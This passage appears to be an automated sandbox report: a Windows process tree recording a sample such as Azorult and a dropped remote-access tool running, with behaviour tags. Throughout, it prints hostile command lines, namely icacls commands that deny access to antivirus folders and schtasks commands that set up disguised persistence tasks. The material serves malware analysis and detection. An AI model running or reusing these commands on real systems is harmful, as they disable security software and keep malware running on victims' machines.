                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:5724
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                      PID:460
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:5580
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                        icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                        PID:112
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:2592
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                          icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                          PID:5232
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:1472
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                            PID:5560
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:4724
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                              PID:948
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:5416
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                PID:4556
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:3340
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                  icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                  PID:5064
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                PID:1888
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                  icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                  PID:948
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                PID:3256
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                  icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                  PID:5416
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:5268
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                    PID:2196
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                  PID:5416
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                  PID:4564
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5576
                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3872,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=3316 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5864
                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=3340,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7444 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:3144
                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=7872,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=8156 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1596
                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6412,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7708 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4260
                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8200,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7952 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:3184
                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8272,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:2576
                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=6140,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7148 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1708
                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7292,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6116 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3340
                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=8180,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=8552 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2916
                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7936,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=8764 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:2732
                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8804,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=8212 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3444
                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:5568
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5268
                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5800
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4896
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\4c4a6ee8-e2ba-47da-8e0e-c5262740992e_ProcessExplorer.zip.92e\Eula.txt
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:4872
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe"
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                • Sets service image path in registry
                                                                                                                                                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: LoadsDriver
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                PID:2060
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                  explorer /select,C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4208
                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/about/terms-of-service
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:5080
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch https://www.virustotal.com/about/terms-of-service
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:5108
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\taskmgr.exe" /0
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                      PID:3076
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\MistInfected_newest.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\MistInfected_newest.exe"
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      PID:5236
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MistInfected_newest.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\MistInfected_newest.exe"
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                        PID:2696
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                      PID:112
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\Azorult.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\Azorult.exe"
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                      PID:2696
                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                      PID:3628
                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                        PID:4728
                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                                                                          PID:5116
                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                        PID:5568
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\Azorult.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\Azorult.exe"
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                      PID:1340
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:3804
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                        PID:4128
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4280
                                                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                            PID:1820
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1592
                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                              PID:5956
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                            PID:5280
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                            PID:5116
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Programdata\RealtekHD\taskhostw.exe"
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                            PID:1856
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6/detection
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1408
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:4204
                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3576
